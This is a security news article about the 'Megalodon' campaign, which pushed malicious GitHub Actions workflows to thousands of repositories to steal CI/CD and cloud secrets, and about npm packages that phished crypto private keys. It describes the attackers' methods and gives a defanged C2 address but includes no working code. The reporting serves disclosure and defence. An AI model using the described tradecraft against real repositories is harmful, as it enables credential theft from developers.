A new large-scale campaign dubbed Megalodon has compromised at least 5,561 GitHub repositories using fake security notifications and malicious pull requests. The attack targeted open-source developers and could have led to token theft and malware infections.
Researchers have detailed a new fully-automated Megalodon campaign. During this time period, the attackers delivered 5718 malicious commits to 5561 GitHub repositories in approximately six hours. The primary objective of the attack was to steal CI/CD secrets, cloud tokens, and developer’s access to their own developer infrastructure.
Researchers from SafeDep stated that the attackers utilized disposable GitHub accounts (e.g., rkb8el9r or lo6wt4t6) with random names, and committed under the names build-bot, auto-ci, ci-bot, and pipeline-bot. The commits looked similar to normal CI/CD maintenance or pipeline updates.
The GitHub Actions workflows containing bash scripts encoded in Base64 would execute once triggered. Upon execution, the malicious workflows collected all sensitive data from the repository, and then sent it to the Command & Control (C2) server located at 216.126.225[.]129:8443.
An enormous amount of sensitive information was exposed during this campaign. The malware stole CI environment variables, AWS credentials, Google Cloud tokens, GitHub Tokens, GitLab CI/CD tokens, Bitbucket credentials, Docker and Kubernetes configurations, Terraform secrets, SSH keys, shell history, and .env, credentials.json, and service-account.json files.
In addition, the researchers reported that the malware searched for API keys, JWT tokens, database connection strings, PEM keys, and cloud tokens utilizing greater than 30 different regular expressions.
One confirmed example included the @tiledesk/tiledesk-server package. In this instance SafeDep discovered a Base64 payload inside the GitHub Actions workflow. Additionally SafeDep reported that all of the compromises took place on May 18, 2026 between 11:36 and 17:48 UTC.
SafeDep also stated that the campaign had two payload variations. The first variation was called SysDiag and was very aggressive; it was triggered upon every push or pull request. The second variation called Optimize-Build was much more stealthy; however, it could only be manually triggered via workflow_dispatch.
“workflow_dispatch makes concessions for operational security,” explained SafeDep. “With over 5,700 compromised repositories — even if we assume an extremely low number of those will provide us with an accessible GITHUB_TOKEN — an attacker can create targets that they can use as needed.”
As soon as the malicious commit merged into the repository, the malware executed within the CI/CD pipelines and continued to propagate outwardly across the open-source community creating what many refer to as a wormhole.
Based upon these events, experts are now drawing comparisons between Megalodon to a larger scale supply chain attacks by TeamPCP and Mini Shai-Hulud. It was TeamPCP that before targeted numerous large open-source projects including TanStack, Grafana Labs, OpenAI, Mistral AI, etc. through dependency injection and the exploitation of open source tools.
“We have entered an age of mass supply chain attacks,” stated Moshe Siman Tov Bustan of OX Security. “TeamPCP’s breach of GitHub was merely the start. We will see an ocean of cyberattacks against developers globally.”
Additionally, researchers identified yet another threat vector associated with npm. An account named polymarketdev released nine malicious npm packages in less than one-minute. These packages presented themselves as CLI tools for trading on Polymarket.
Upon installation of the package(s), a fake wallet binding window opened asking for insertion of an Ethereum or Polygon private key. SafeDep found that the private keys were transmitted in plain-text via Cloudflare Worker.
“The attacker established a complete trading CLI interface around a credential theft operation,” stated the analysts regarding the attack. They added that the attackers used social engineering and impersonation of a legitimate application in order to carry out the attack.
Hudson Rock subsequently published its own findings relating Megalodon to infostealer infections. The company stated that more than 33% of GitHub users whose repositories were affected in the attack were listed in the databases of stolen data from infected computers.
“The Megalodon campaign is a stark reminder that once a developer has been infected with infostealer malware, GitHub becomes a launchpad for catastrophic cascading attacks,” stated Hudson Rock.
Following several incidents, npm has started to revoke access tokens that allow them to bypass two-factor authentication and recommend that developers utilize Trusted Publishing.
Socket indicated that simply resetting tokens would not resolve the issue. “Resetting merely offers temporary relief. It does nothing to fix the fundamental flaw.
